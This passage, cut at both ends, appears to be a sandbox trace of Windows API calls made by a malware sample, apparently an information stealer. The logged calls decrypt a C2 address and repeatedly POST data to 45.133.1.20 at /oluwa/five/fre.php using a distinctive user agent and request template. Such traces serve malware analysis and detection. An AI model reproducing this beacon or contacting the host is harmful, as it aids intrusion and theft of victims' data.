(Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0240.630] GetProcessHeap () returned 0x6a0000 [0240.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db810 [0240.630] GetProcessHeap () returned 0x6a0000 [0240.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0240.631] GetProcessHeap () returned 0x6a0000 [0240.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0240.631] GetProcessHeap () returned 0x6a0000 [0240.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0240.631] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0240.632] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0240.632] GetProcessHeap () returned 0x6a0000 [0240.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0240.632] GetProcessHeap () returned 0x6a0000 [0240.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0240.653] send (s=0x7a4, buf=0x6bd460*, len=242, flags=0) returned 242 [0240.654] send (s=0x7a4, buf=0x6bb998*, len=159, flags=0) returned 159 [0240.654] GetProcessHeap () returned 0x6a0000 [0240.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0240.654] recv (in: s=0x7a4, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0240.773] GetProcessHeap () returned 0x6a0000 [0240.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0240.774] GetProcessHeap () returned 0x6a0000 [0240.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0240.774] GetProcessHeap () returned 0x6a0000 [0240.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db810 | out: hHeap=0x6a0000) returned 1 [0240.774] GetProcessHeap () returned 0x6a0000 [0240.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0240.775] closesocket (s=0x7a4) returned 0 [0240.776] GetProcessHeap () returned 0x6a0000 [0240.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0240.776] GetProcessHeap () returned 0x6a0000 [0240.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0240.776] GetProcessHeap () returned 0x6a0000 [0240.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0240.777] GetProcessHeap () returned 0x6a0000 [0240.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0240.795] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14d8) returned 0x7a4 [0240.797] Sleep (dwMilliseconds=0xea60) [0240.799] GetProcessHeap () returned 0x6a0000 [0240.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0240.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.801] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0240.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.810] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0240.819] GetProcessHeap () returned 0x6a0000 [0240.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0240.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.821] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0240.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.822] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0240.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.828] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0240.828] GetProcessHeap () returned 0x6a0000 [0240.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0240.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.829] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0240.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.833] CryptDestroyKey (hKey=0x6ad020) returned 1 [0240.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.837] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0240.837] GetProcessHeap () returned 0x6a0000 [0240.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0240.838] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.838] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0240.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.839] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0240.840] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.840] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0240.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.841] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0240.841] GetProcessHeap () returned 0x6a0000 [0240.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0240.841] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0240.842] GetProcessHeap () returned 0x6a0000 [0240.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0240.842] GetProcessHeap () returned 0x6a0000 [0240.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0240.843] GetProcessHeap () returned 0x6a0000 [0240.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0240.843] GetProcessHeap () returned 0x6a0000 [0240.843] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0240.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.848] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0240.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.855] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0240.864] GetProcessHeap () returned 0x6a0000 [0240.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0240.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.866] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0240.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.867] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0240.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.871] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0240.871] GetProcessHeap () returned 0x6a0000 [0240.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0240.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.873] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0240.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.874] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0240.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0240.875] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0240.875] GetProcessHeap () returned 0x6a0000 [0240.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0240.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.877] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0240.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.878] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0240.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.879] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0240.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.883] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0240.883] GetProcessHeap () returned 0x6a0000 [0240.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0240.883] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0240.883] GetProcessHeap () returned 0x6a0000 [0240.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0240.883] socket (af=2, type=1, protocol=6) returned 0x7a8 [0240.884] connect (s=0x7a8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0240.910] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0240.910] GetProcessHeap () returned 0x6a0000 [0240.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0240.910] GetProcessHeap () returned 0x6a0000 [0240.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0240.911] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0240.912] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0240.912] GetProcessHeap () returned 0x6a0000 [0240.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dbd50 [0240.912] GetProcessHeap () returned 0x6a0000 [0240.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0240.915] GetProcessHeap () returned 0x6a0000 [0240.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0240.915] GetProcessHeap () returned 0x6a0000 [0240.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0240.916] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0240.917] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0240.918] GetProcessHeap () returned 0x6a0000 [0240.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0240.918] GetProcessHeap () returned 0x6a0000 [0240.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0240.918] send (s=0x7a8, buf=0x6bd460*, len=242, flags=0) returned 242 [0240.919] send (s=0x7a8, buf=0x6bb998*, len=159, flags=0) returned 159 [0240.919] GetProcessHeap () returned 0x6a0000 [0240.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0240.919] recv (in: s=0x7a8, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0241.025] GetProcessHeap () returned 0x6a0000 [0241.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0241.026] GetProcessHeap () returned 0x6a0000 [0241.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0241.027] GetProcessHeap () returned 0x6a0000 [0241.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbd50 | out: hHeap=0x6a0000) returned 1 [0241.028] GetProcessHeap () returned 0x6a0000 [0241.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0241.029] closesocket (s=0x7a8) returned 0 [0241.029] GetProcessHeap () returned 0x6a0000 [0241.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0241.029] GetProcessHeap () returned 0x6a0000 [0241.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0241.030] GetProcessHeap () returned 0x6a0000 [0241.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0241.031] GetProcessHeap () returned 0x6a0000 [0241.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0241.031] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14dc) returned 0x7a8 [0241.033] Sleep (dwMilliseconds=0xea60) [0241.036] GetProcessHeap () returned 0x6a0000 [0241.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0241.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.037] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0241.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.047] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0241.060] GetProcessHeap () returned 0x6a0000 [0241.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0241.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.062] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0241.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.063] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0241.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.064] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.064] GetProcessHeap () returned 0x6a0000 [0241.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0241.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.066] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0241.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.073] CryptDestroyKey (hKey=0x6ad520) returned 1 [0241.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.074] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0241.074] GetProcessHeap () returned 0x6a0000 [0241.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0241.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.076] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0241.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.077] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0241.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.081] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0241.082] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.082] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0241.082] GetProcessHeap () returned 0x6a0000 [0241.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0241.082] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0241.083] GetProcessHeap () returned 0x6a0000 [0241.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0241.083] GetProcessHeap () returned 0x6a0000 [0241.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0241.083] GetProcessHeap () returned 0x6a0000 [0241.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0241.084] GetProcessHeap () returned 0x6a0000 [0241.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0241.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.085] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0241.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.095] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0241.106] GetProcessHeap () returned 0x6a0000 [0241.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0241.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.108] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0241.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.109] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0241.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.110] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.110] GetProcessHeap () returned 0x6a0000 [0241.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0241.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.114] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0241.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.115] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0241.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0241.116] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0241.116] GetProcessHeap () returned 0x6a0000 [0241.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0241.117] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.118] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0241.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.119] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0241.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.120] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0241.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0241.121] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0241.121] GetProcessHeap () returned 0x6a0000 [0241.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0241.121] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0241.121] GetProcessHeap () returned 0x6a0000 [0241.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0241.121] socket (af=2, type=1, protocol=6) returned 0x7ac [0241.122] connect (s=0x7ac, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0241.146] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0241.159] GetProcessHeap () returned 0x6a0000 [0241.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0241.159] GetProcessHeap () returned 0x6a0000 [0241.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0241.160] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0241.161] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0241.162] GetProcessHeap () returned 0x6a0000 [0241.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db810 [0241.162] GetProcessHeap () returned 0x6a0000 [0241.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0241.162] GetProcessHeap () returned 0x6a0000 [0241.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0241.162] GetProcessHeap () returned 0x6a0000 [0241.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0241.163] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0241.164] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: 